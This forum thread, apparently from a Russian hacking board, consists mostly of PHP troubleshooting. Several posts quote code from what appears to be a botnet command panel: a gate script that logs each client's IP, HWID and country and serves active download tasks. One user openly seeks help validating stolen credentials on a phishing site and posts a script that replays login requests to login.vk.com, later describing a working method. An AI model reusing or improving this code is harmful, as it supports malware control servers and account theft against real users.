Вопрос - Ответ

reming

HDD-drive
Пользователь
Регистрация
14.06.2013
Сообщения
39
Реакции
1
Баллы
15
Ставлю панель на сервер с Ubuntu 16.04. Установил все пакеты по этим мануалам:
1. https://www.digitalocean.com/community/tutorials/linux-apache-mysql-php-lamp-ubuntu-16-04-ru
2. https://www.digitalocean.com/community/tutorials/phpmyadmin-ubuntu-16-04-ru
Но, когда захожу в панель, то текст отображается не корректно, вот так http://prntscr.com/oh95d6, в чем может быть причина?
PHP стоит однозначно
, тут либо нестыковка версий PHP либо включить надо
Код:
short_open_tag=On

логи смотрели на наличие ошибок ?
 

ViCode

ripper
КИДАЛА
Регистрация
20.08.2019
Сообщения
413
Реакции
377
Баллы
67
Пожалуйста, обратите внимание, что пользователь заблокирован

reming

HDD-drive
Пользователь
Регистрация
14.06.2013
Сообщения
39
Реакции
1
Баллы
15
обработает , если и test1 и test2 существуют , оба сразу
так и хотел комрад , имхо
 

ViCode

ripper
КИДАЛА
Регистрация
20.08.2019
Сообщения
413
Реакции
377
Баллы
67
Пожалуйста, обратите внимание, что пользователь заблокирован
Мб что не так делаю посылаю 2 запроса:
index.php?test1=ok
index.php?test2=no
Эти запросы добавляют в базу соответственно значения в столбцы OK и NO

По отдельности запросы добавляются в разных таблицах

Весь код:

PHP:
else if (isset($_GET['test1']) and isset($_GET['test2']) ) {
    $test1 = mysql_real_escape_string($_GET['test1']);

$test2 = mysql_real_escape_string($_GET['test2']);

    $d = date('m/d/Y h:i:s a', time());
    if(mysql_num_rows(mysql_query("SELECT * FROM `goods` WHERE `test1`='test1', `test2`='test2' ")) > 0){
        date_default_timezone_set('Etc/GMT+3');
        mysql_query("UPDATE `goods` SET `seen`='$d', `ip`='".$_SERVER['REMOTE_ADDR']."' WHERE `test1`='$test1', `test2`='test2' ");


        $response = "";
        $tasks = mysql_query("SELECT * FROM `tasks` WHERE `trigger`='On join' AND `status`='ACTIVE'");
        for ($x = 0; $x < mysql_num_rows($tasks); $x++){
            $task = mysql_fetch_assoc($tasks);
            $response .= $task['type'].";".$task['url'].";".$task['id']."|";
        }

        $tasks = mysql_query("SELECT * FROM `tasks` WHERE `trigger`='Every client once' AND `status`='ACTIVE'");
        for ($x = 0; $x < mysql_num_rows($tasks); $x++){
            $task = mysql_fetch_assoc($tasks);
            if(mysql_num_rows(mysql_query("SELECT * FROM `completed` WHERE `test1`='$test1' AND `taskid`='".$task['id']."'")) < 1)
                $response .= $task['type'].";".$task['url'].";".$task['id']."|";
        }

        echo $response;

    }

    else{
        $loc = json_decode(file_get_contents('http://www.geoplugin.net/json.gp?ip='.$_SERVER['REMOTE_ADDR']), true);
        $c = $loc['geoplugin_countryName'];
        mysql_query("INSERT INTO `goods` SET `ip`='".$_SERVER['REMOTE_ADDR']."', `test1`='$test1', `test2`='$test2', `seen`='$d', `location`='$c'");
  

        $response = "";
        $tasks = mysql_query("SELECT * FROM `tasks` WHERE `trigger`='On join' AND `status`='ACTIVE'");
        for ($x = 0; $x < mysql_num_rows($tasks); $x++){
            $task = mysql_fetch_assoc($tasks);
            $response .= $task['type'].";".$task['url'].";".$task['id']."|";
        }

        $tasks = mysql_query("SELECT * FROM `tasks` WHERE `trigger`='Every client once' AND `status`='ACTIVE'");
        for ($x = 0; $x < mysql_num_rows($tasks); $x++){
            $task = mysql_fetch_assoc($tasks);
            if(mysql_num_rows(mysql_query("SELECT * FROM `completed` WHERE `test1`='$test1' AND `taskid`='".$task['id']."'")) < 1)
                $response .= $task['type'].";".$task['url'].";".$task['id']."|";
        }

        echo $response;
    }
}
 

reming

HDD-drive
Пользователь
Регистрация
14.06.2013
Сообщения
39
Реакции
1
Баллы
15
Последнее редактирование:

ViCode

ripper
КИДАЛА
Регистрация
20.08.2019
Сообщения
413
Реакции
377
Баллы
67
Пожалуйста, обратите внимание, что пользователь заблокирован
подразумевает что до этого есть еще if конструкция
esle в переводе означает "иначе"
Выше только это:


PHP:
else if (isset($_GET['completed'])){
     $hwid = mysql_real_escape_string($_GET['test1']);
     $id = mysql_real_escape_string($_GET['completed']);
     mysql_query("INSERT INTO `completed` SET `test1`='$test1', `taskid`='$id'");
     echo mysql_error();
}
Что такое if else мне знакомо, я на шарпе кодю.
 

soldxqe

RAM
Пользователь
Регистрация
24.05.2019
Сообщения
107
Реакции
36
Баллы
23
установил xampp ,импортировал базу sql в phpmyadmin,при конекте на локальный хост выдаёт вот такое

Код:
Неустранимая ошибка : необработанная ошибка: вызов неопределенной функции mysql_connect () в C: \ xampp \ htdocs \ Server \ connect_db.php: 2 Трассировка стека: # 0 C: \ xampp \ htdocs \ Server \ attacker_panel.php (94): включить () # 1 {main}, брошенный в C: \ xampp \ htdocs \ Server \ connect_db.php в строке 2
 

Apocalypse

(L1) cache
Пользователь
Регистрация
28.06.2011
Сообщения
533
Реакции
409
Баллы
71
Возможно у тебя пхп слишком новое, а mysql_connect более не поддерживается, т.ч либо ставишь 5.4 или переходишь на mysqli
 

ZAMAN

floppy-диск
Пользователь
Регистрация
01.07.2019
Сообщения
6
Реакции
1
Баллы
3
подскажите, как реализовать проверку валидности, вводимых данных, на фишинговом сайте?
я скопировал post запрос с сайта, и попробовал отправить тоже самое со своего сервера но в ответ получаю 400 Bad Request Server
PHP:
<?php
    $proxy = "login.vk.com";
    $port = "80";

    $fp = fsockopen($proxy, $port, $errno, $errstr, 30);
    stream_set_blocking($fp, false);
    if($fp)
    {
        $data = "act=login&role=al_frame&expire=&recaptcha=&captcha_sid=&captcha_key=&_origin=https%3A%2F%2Fvk.com&ip_h=c752a5225d8047ad49&lg_h=1d0ed2f0f8d74b2bb5&ul=&email=%2B79409999999&pass=asdfghjhgfds";
        $headers  = "POST login.vk.com/?act=login HTTP/1.1\r\n";
        $headers .= "Host: login.vk.com\r\n";
        $headers .= "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n";
        $headers .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $headers .= "Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3\r\n"; 
        $headers .= "Accept-Encoding: gzip, deflate, br\r\n";
        $headers .= "Content-Type: application/x-www-form-urlencoded/=\r\n";
        $headers .= "Content-Length: 188\r\n";
        $headers .= "DNT: 1\r\n";
        $headers .= "Connection: keep-alive\r\n";
        $headers .= "Referer: https://vk.com/\r\n";
        $headers .= "Upgrade-Insecure-Requests: 1\r\n\r\n";
 
        $fw = fwrite($fp, $headers.$data);
        while (!feof($fp)) {
        echo fgets($fp, 128);
    }
        fclose($fp);
    } else die;
?>
подскажите где ошибка, или здесь вообще подход иной?
 

ZAMAN

floppy-диск
Пользователь
Регистрация
01.07.2019
Сообщения
6
Реакции
1
Баллы
3
подскажите, как реализовать проверку валидности, вводимых данных, на фишинговом сайте?
я скопировал post запрос с сайта, и попробовал отправить тоже самое со своего сервера но в ответ получаю 400 Bad Request Server
PHP:
<?php
    $proxy = "login.vk.com";
    $port = "80";

    $fp = fsockopen($proxy, $port, $errno, $errstr, 30);
    stream_set_blocking($fp, false);
    if($fp)
    {
        $data = "act=login&role=al_frame&expire=&recaptcha=&captcha_sid=&captcha_key=&_origin=https%3A%2F%2Fvk.com&ip_h=c752a5225d8047ad49&lg_h=1d0ed2f0f8d74b2bb5&ul=&email=%2B79409999999&pass=asdfghjhgfds";
        $headers  = "POST login.vk.com/?act=login HTTP/1.1\r\n";
        $headers .= "Host: login.vk.com\r\n";
        $headers .= "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n";
        $headers .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $headers .= "Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3\r\n";
        $headers .= "Accept-Encoding: gzip, deflate, br\r\n";
        $headers .= "Content-Type: application/x-www-form-urlencoded/=\r\n";
        $headers .= "Content-Length: 188\r\n";
        $headers .= "DNT: 1\r\n";
        $headers .= "Connection: keep-alive\r\n";
        $headers .= "Referer: https://vk.com/\r\n";
        $headers .= "Upgrade-Insecure-Requests: 1\r\n\r\n";

        $fw = fwrite($fp, $headers.$data);
        while (!feof($fp)) {
        echo fgets($fp, 128);
    }
        fclose($fp);
    } else die;
?>
подскажите где ошибка, или здесь вообще подход иной?
возможно ошибка в строке
$headers .= "Content-Length: 188\r\n";
но если заменить на
$headers .= "Content-Length:" .strlen($data) "\r\n";
ответ вообще не приходит
 

ShishkaBob

HDD-drive
Пользователь
Регистрация
30.09.2019
Сообщения
37
Реакции
26
Баллы
9
подскажите, как реализовать проверку валидности, вводимых данных, на фишинговом сайте?
я скопировал post запрос с сайта, и попробовал отправить тоже самое со своего сервера но в ответ получаю 400 Bad Request Server

подскажите где ошибка, или здесь вообще подход иной?
Скорее всего, ошибка из-за того что серв запросы на авторизацию принимает только с определенных доменов. То есть если ты со своего шлешь запрос, он тебя шлет подальше.
Плюс я вижу там капча и хеш айпи, по ним тоже сверка идёт скорее всего, и ты её не проходишь.
 

ZAMAN

floppy-диск
Пользователь
Регистрация
01.07.2019
Сообщения
6
Реакции
1
Баллы
3
Скорее всего, ошибка из-за того что серв запросы на авторизацию принимает только с определенных доменов. То есть если ты со своего шлешь запрос, он тебя шлет подальше.
Плюс я вижу там капча и хеш айпи, по ним тоже сверка идёт скорее всего, и ты её не проходишь.
нет, всё работает
в запросе опечатка:
PHP:
$headers .= "Content-Type: application/x-www-form-urlencoded/=\r\n";
ещё в запрос нужно было куки добавить.
ответ сервера меняется, в зависимости от того, ввожу я валидный логин-пароль, или нет.
также сервер реагирует на: передаваемые в запрос кукисы(не все), и значение поля lg_h.

дальше я начал гавнокодить:
первое, через get_geaders("vk.com") получаю заголовки,
второе, спарсив куки получаю страницу через file_get_content добавив в него context с куками,
третье, получив поле lg_h формирую POST запрос передаю тута куки, lg_h, логин и пароль.
четвертое, иду ломать мебель в доме!!!, ибо полученный от сервера ответ, всегда говорит что, логин и пароль не верен,
пятое, иду просить помощь.
 

dr.alex

HDD-drive
Пользователь
Регистрация
04.03.2019
Сообщения
48
Реакции
6
Баллы
8
Подскажите пожалуйста куда копать.
Ситуация следующая, ставлю софт на сервер:
1. debian 8, php 5.6 в логе ошибка:
Код:
PHP Notice:  Use of undefined constant DB_HOST - assumed 'DB_HOST' in /db_connect.php on line 4, referer:
PHP Notice:  Use of undefined constant DB_USER - assumed 'DB_USER' in /db_connect.php on line 4, referer:
PHP Notice:  Use of undefined constant DB_PASS - assumed 'DB_PASS' in /database/db_connect.php on line 4, referer:
PHP Fatal error:  Uncaught exception 'Exception' with message 'SafeMySQL: 2003 Can't connect to MySQL server on 'DB_HOST'
(111)' in /safemysql.php:580\nStack trace:\n#0 /safemysql.php(110): SafeMySQL->error('2003 Can't conn...')\n#1 /db_connect.php(4):
SafeMySQL->__construct(Array)\n#2 gate.php(2): include_once('/home/admin/web...')\n#3 {main}\n  thrown in /safemysql.php on line 580, referer: t.php
2. ставлю на свой локальный комп, mint 19, php 7.2 все работает без проблем. ок
3. ставлю на сервер centos 7, php 7.2 такая же проблема лезут ошибки.
Код файла db_connect.php
Код:
<?php
    include_once "config.php";
    include_once "safemysql.php";
    $db = new SafeMySQL(array("host" => DB_HOST, "user" => DB_USER, "pass" => DB_PASS, "db" => DB_DATABASE, "charset" => 'utf8', "port" => DB_PORT));
?>
Я так понимаю что четвертая ошика выпадает из-за первых трех, также понимаю что где то просто решается, но блин понять не могу.
При установке файлы не менялись, ничего не трогалось, за исключением логин пасс на подключение к БД.
 
  • Like
Реакции: hits

hits

RAID-массив
Пользователь
Регистрация
10.12.2018
Сообщения
52
Реакции
51
Баллы
19
люди добрые подскажите как мигрировать код на php 7,пишет такую бодягу : Unknown: Function create_function() is deprecated in строка в коде:
PHP:
usort($cats, create_function('$a, $b', 'return strnatcasecmp( $a["name"], $b["name"]);'));
 

Pernat1y

(L1) cache
Пользователь
Регистрация
19.04.2008
Сообщения
515
Реакции
174
Баллы
51
Jabber
люди добрые подскажите как мигрировать код на php 7,пишет такую бодягу : Unknown: Function create_function() is deprecated in строка в коде:
PHP:
usort($cats, create_function('$a, $b', 'return strnatcasecmp( $a["name"], $b["name"]);'));
Гугл-же:
 
  • Like
Реакции: hits
Верх